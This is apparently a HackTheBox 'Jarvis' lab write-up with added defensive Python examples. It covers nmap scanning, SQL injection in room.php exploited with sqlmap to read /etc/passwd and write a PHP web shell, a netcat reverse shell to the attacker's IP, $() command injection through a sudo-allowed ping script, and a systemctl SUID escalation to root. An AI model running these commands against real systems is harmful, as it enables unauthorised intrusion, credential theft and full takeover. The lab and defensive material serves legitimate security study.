HTB-jarvis

Information gathering

TCP open-port scan

# Nmap 7.93 scan initiated Wed Jan 10 10:33:35 2024 as: nmap -v --min-rate 10000 -p- -oA tcp_open_port 10.129.229.137
Increasing send delay for 10.129.229.137 from 0 to 5 due to 2006 out of 6686 dropped probes since last increase.
Warning: 10.129.229.137 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.129.229.137 from 640 to 1000 due to 2215 out of 7382 dropped probes since last increase.
Nmap scan report for 10.129.229.137
Host is up (0.78s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
64999/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Jan 10 10:34:10 2024 -- 1 IP address (1 host up) scanned in 34.87 seconds

UDP open-port scan

# Nmap 7.93 scan initiated Wed Jan 10 10:34:10 2024 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 10.129.229.137
Nmap scan report for 10.129.229.137
Host is up (0.20s latency).
Not shown: 65515 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
7753/udp  closed unknown
8197/udp  closed unknown
8734/udp  closed unknown
10119/udp closed unknown
12198/udp closed unknown
18588/udp closed unknown
22826/udp closed unknown
24343/udp closed unknown
25717/udp closed unknown
35935/udp closed unknown
36523/udp closed unknown
39133/udp closed unknown
42613/udp closed unknown
43102/udp closed unknown
44636/udp closed unknown
45508/udp closed unknown
50026/udp closed unknown
50287/udp closed unknown
50789/udp closed unknown
63480/udp closed unknown

Service scan on the open ports

# Nmap 7.93 scan initiated Wed Jan 10 10:36:54 2024 as: nmap -v -sC -sT -sV -O -p22,80,64999, -oA open_port_service 10.129.229.137
Nmap scan report for 10.129.229.137
Host is up (0.20s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03f34e22363e3b813079ed4967651667 (RSA)
|   256 25d808a84d6de8d2f8434a2c20c85af6 (ECDSA)
|_  256 77d4ae1fb0be151ff8cdc8153ac369e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.16 (94%), Linux 3.18 (94%), Linux 3.8 - 3.11 (94%), Linux 4.4 (94%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Jan 10 10:35:22 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 10 10:37:25 2024 -- 1 IP address (1 host up) scanned in 31.13 seconds

We can see that TCP ports 22, 80 and 64999 are open. Port 22 is SSH; 80 and 64999 are both HTTP with the same middleware version, Apache httpd 2.4.25. It is not yet clear whether they serve the same content, so note it down for now.

getshell

Port 80

        Opening it shows a hotel website. Looking at the homepage source, one charming URL immediately stands out:

http://logger.htb//room.php?cod=2, the typical format of a SQL-injectable URL.

        Trying ① http://logger.htb//room.php?cod=2, ② http://logger.htb//room.php?cod=2-, ③ http://logger.htb//room.php?cod=2-- +, ① and ③ return the same result while ② differs from both, so SQL injection is suspected. Then order by gives the column count as 7; at http://logger.htb//room.php?cod=2 union select 1,2,3,4,5,6,7-- + no numbers appeared on the page, so the rest was handed to sqlmap to run automatically.
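The reason the cod parameter was injectable, and the fix, shown side by side. This is an added example, not code from the original write-up or from the target site: it rebuilds the pattern in Python against an in-memory SQLite database, and the table and column names (room, cod, users) and the row contents are constructed assumptions.

```python
"""Added example: untrusted query parameter concatenated into SQL (as behind
room.php?cod=) versus parameter binding. Schema and rows are constructed."""
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed schema: a room table the page queries and a users table the
    # application never intends to expose through room.php.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE room (cod INTEGER, name TEXT, price INTEGER);
        INSERT INTO room VALUES (1, 'Standard', 160), (2, 'Suite', 220);
        CREATE TABLE users (id INTEGER, login TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'dbadmin', 'constructed-hash-value');
        """
    )
    return conn


def lookup_room_vulnerable(conn: sqlite3.Connection, cod: str) -> list:
    # The untrusted value is pasted into the SQL text, so it can change the
    # statement: a UNION with a matching column count pulls in other tables.
    sql = "SELECT cod, name, price FROM room WHERE cod=" + cod
    return conn.execute(sql).fetchall()


def lookup_room_safe(conn: sqlite3.Connection, cod: str) -> list:
    # Validate the type first (a room id is an integer), then bind the value.
    # A bound parameter is never parsed as SQL, so no payload can alter the query.
    if not cod.isdigit():
        raise ValueError("room id must be an integer")
    return conn.execute(
        "SELECT cod, name, price FROM room WHERE cod=?", (int(cod),)
    ).fetchall()


def run_demo() -> dict:
    conn = build_db()
    # Constructed payload of the same shape as the union select probe above.
    payload = "2 union select id, login, pw_hash from users"
    out = {"vulnerable": lookup_room_vulnerable(conn, payload)}
    try:
        lookup_room_safe(conn, payload)
        out["safe_rejected"] = False
    except ValueError:
        out["safe_rejected"] = True
    out["safe_normal"] = lookup_room_safe(conn, "2")
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The vulnerable lookup returns the users row alongside the room row; the safe lookup rejects the payload before it ever reaches the database and still serves the normal request.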

        Save the request to a file, then:

        sqlmap -r inject.req --batch --level=5 --risk=3

        sqlmap dumped the database username and password hash, and its automatic dictionary attack recovered the plaintext password imissyou. Because gobuster directory brute-forcing during the source review had shown there is no login page, and sqlmap found no user-related tables in the current database, the attack vector was guessed to be file writing.

        First verify whether file reading works:

                 sqlmap -r inject.req --batch --level=5 --risk=3 --file-read /etc/passwd

        This returns the target's /etc/passwd.

                sqlmap -r inject.req --batch --level=5 --risk=3 --file-read /var//www/html/index.php

        This returns the site's homepage source and also confirms that the web root is /var/www/html.

        Write a one-line PHP web shell to a file, then upload it to the target.

        sqlmap -r inject.req --batch --level=5 --risk=3 --file-write php-reverse-shell.php --file-dest /var/www/html/2.php

         Connect:

        Then reverse the shell back to Kali; Kali listens on port 9001:

                rlwrap nc -lvnp 9001

       In the browser, enter the reverse-shell command:

                nc -e /bin/bash 10.10.16.21 9001
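From the defender's side, every step in this section leaves a trace in the Apache access log: the order by and union select probes, sqlmap's default User-Agent, and the first request for a PHP file that was never part of the site. The script below is an added example, not part of the original write-up; it flags those traces in combined-format log lines. The log lines are constructed for the example (the source address reuses the Kali IP from the write-up), and the allowlist of known PHP files is an assumption.

```python
"""Added example: flag SQL-injection probes, sqlmap traffic and requests for
unknown PHP files in Apache combined-format access log lines (constructed)."""
import re
from urllib.parse import urlsplit, unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Files the site is known to serve (assumed allowlist); any other .php request
# is worth a look, since the write-up drops 2.php into the web root.
KNOWN_PHP = {"/index.php", "/room.php"}

# Patterns applied to the URL-decoded query string.
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "order-by": re.compile(r"\border\s+by\b", re.I),
    "sql-comment": re.compile(r"(--|#|/\*)"),
    "boolean-test": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "file-primitive": re.compile(r"load_file\s*\(|into\s+(out|dump)file", re.I),
}

# Constructed sample log: one normal request followed by the kinds of requests
# the getshell section describes.
SAMPLE_LOG = """\
10.10.16.21 - - [10/Jan/2024:10:40:01 +0000] "GET /room.php?cod=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.16.21 - - [10/Jan/2024:10:40:05 +0000] "GET /room.php?cod=2%20order%20by%208--%20+ HTTP/1.1" 200 3080 "-" "Mozilla/5.0"
10.10.16.21 - - [10/Jan/2024:10:40:09 +0000] "GET /room.php?cod=2%20union%20select%201,2,3,4,5,6,7--%20+ HTTP/1.1" 200 3080 "-" "Mozilla/5.0"
10.10.16.21 - - [10/Jan/2024:10:41:30 +0000] "GET /room.php?cod=2%20AND%201=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.10.16.21 - - [10/Jan/2024:10:45:00 +0000] "GET /2.php HTTP/1.1" 200 21 "-" "Mozilla/5.0"
"""


def analyse_log(text: str) -> list:
    """Return one finding per suspicious line: line number, source IP, path, reasons."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not combined format; skip rather than guess
        parts = urlsplit(match["target"])
        query = unquote_plus(parts.query)
        reasons = [tag for tag, rx in SQLI_PATTERNS.items() if rx.search(query)]
        if "sqlmap" in match["ua"].lower():
            reasons.append("sqlmap-user-agent")
        if parts.path.endswith(".php") and parts.path not in KNOWN_PHP:
            reasons.append("unknown-php-file")
        if reasons:
            findings.append(
                {"line": number, "ip": match["ip"], "path": parts.path, "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding)
```

The decoded query is matched rather than the raw URL, so %20 and + encoding does not hide the keywords; the sqlmap default User-Agent is the cheapest signal and the one an attacker changes first, which is why the content patterns are kept as well.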

Privilege escalation

www-data -> pepper

        Use python or script to upgrade the shell to an interactive one:

                python3 -c 'import pty;pty.spawn("/bin/bash")'

               or /usr/bin/script -qc /bin/bash /dev/null

        sudo -l shows whether any command is available for privilege escalation: /var/www/Admin-Utilities/simpler.py can be run as the pepper user without a password.

        Looking at the script's contents, the part that executes the ping command stands out.

        Only a limited set of characters is filtered; $() is not, so $(/bin/bash) can be used to bypass it.

        The newly obtained shell has no output echo, so reverse it again to get a proper shell.
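The lesson from simpler.py is that a character blocklist in front of a shell command is the wrong control. The added example below (not the contents of simpler.py, and not part of the original write-up) puts a constructed blocklist beside an allowlist check for a ping target: the blocklist lets a $() substitution through exactly as the write-up describes, while the allowlist only accepts an IP literal or a plain hostname and never hands the value to a shell at all. BLOCKED_CHARS and the hostname pattern are assumptions.

```python
"""Added example: blocklist versus allowlist validation of a ping target.
BLOCKED_CHARS is a constructed stand-in for a limited character filter."""
import ipaddress
import re

# Constructed blocklist; like any blocklist it only stops what its author
# thought of, and "$(" is not on it.
BLOCKED_CHARS = ("&", ";", "|", "`")

# Hostname allowlist: alphanumerics, dots and hyphens, and never a leading
# hyphen, so the value cannot be parsed as a ping option either.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def blocklist_accepts(target: str) -> bool:
    """The weak check: reject only if a blocked character is present."""
    return not any(c in target for c in BLOCKED_CHARS)


def allowlist_accepts(target: str) -> bool:
    """The strong check: accept only an IP literal or a plain hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(target))


def ping_argv(target: str) -> list:
    """Build the argument vector for subprocess.run(..., shell=False).
    Passing a list with no shell means metacharacters are never interpreted,
    which is the second half of the fix alongside the allowlist."""
    if not allowlist_accepts(target):
        raise ValueError(f"refusing to ping {target!r}")
    return ["ping", "-c", "1", target]


if __name__ == "__main__":
    for candidate in ("10.10.16.21", "example.test", "$(/bin/bash)", "-c"):
        print(f"{candidate!r:18} blocklist={blocklist_accepts(candidate)} "
              f"allowlist={allowlist_accepts(candidate)}")
```

A sudo rule that lets www-data run a script as another user multiplies the impact of a validation bug like this; the allowlist plus shell-free execution is what makes the rule safe to keep.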

pepper -> root

        Check for SUID files:

                find / -type f -perm -u=s 2>/dev/null

         /bin/systemctl is found.

        Looking it up on GTFOBins (systemctl | GTFOBins), there is a SUID privilege-escalation method. Run:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

        Then check the attributes of /bin/bash: the s bit is now set.

        Finally /bin/bash -p, success!
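Both halves of this escalation are visible to a SUID audit: the unexpected SUID bit on /bin/systemctl before, and the SUID bit the unit drops onto /bin/bash afterwards. The script below is an added example, not part of the original write-up; it compares SUID executables against a baseline of binaries that are expected to carry the bit and reports the rest. The baseline is a constructed assumption and should be built from a known-good host of the same build, and the sample file list is constructed so the check runs without touching the real filesystem.

```python
"""Added example: report SUID executables that are not in an expected baseline."""
import os
import stat

# Constructed baseline; derive the real one from a known-good reference host.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/bin/su",
    "/bin/mount", "/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/usr/bin/gpasswd", "/bin/ping",
}

# Constructed sample of (path, st_mode) pairs standing in for a filesystem walk:
# 0o104755 is a regular file with the SUID bit set, 0o100755 without it.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755),
    ("/bin/systemctl", 0o104755),   # the finding from the write-up
    ("/bin/ls", 0o100755),
    ("/bin/bash", 0o104755),        # what the systemd unit leaves behind
]


def unexpected_suid(entries, baseline=EXPECTED_SUID) -> list:
    """Return sorted paths whose mode has S_ISUID and that are not in the baseline."""
    return sorted(
        path for path, mode in entries
        if (mode & stat.S_ISUID) and path not in baseline
    )


def scan_filesystem(root: str = "/"):
    """Yield (path, st_mode) for regular files under root, skipping pseudo filesystems."""
    skip = ("/proc", "/sys", "/dev", "/run")
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if dirpath.startswith(skip):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode


if __name__ == "__main__":
    print("sample:", unexpected_suid(SAMPLE_ENTRIES))
    # Real run (may take a while on a large filesystem):
    for path in unexpected_suid(scan_filesystem("/")):
        print("unexpected SUID:", path)
```

Run on a schedule and diffed against the previous result, this turns a single find command into a change alert: a binary gaining the SUID bit between two runs, as /bin/bash does here, is the event worth paging on.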

Personal summary

        This box is not difficult, but the detours are worth recording.

        ① When writing the file via sqlmap injection, I first used the php-reverse-shell.php that ships with Kali. After running the command, the browser showed the upload had not succeeded; I had not read sqlmap's output and assumed /var/www/html/ was not writable, so I went looking for other attack vectors. Having exhausted every other possibility with no vector left, I wondered whether this could be narrowed down step by step: I first uploaded a 1.txt containing only the text "test", which the browser could fetch; then a hand-written one-line PHP web shell also uploaded fine. Only then did I realise the upload had failed because the file was too large!

        ② For confirming the web root, I went looking for the Apache configuration file first; in fact it is better to check the common /var/www/html directory first and only look for the apache configuration if that fails, since the former is easier to verify and a better use of time!
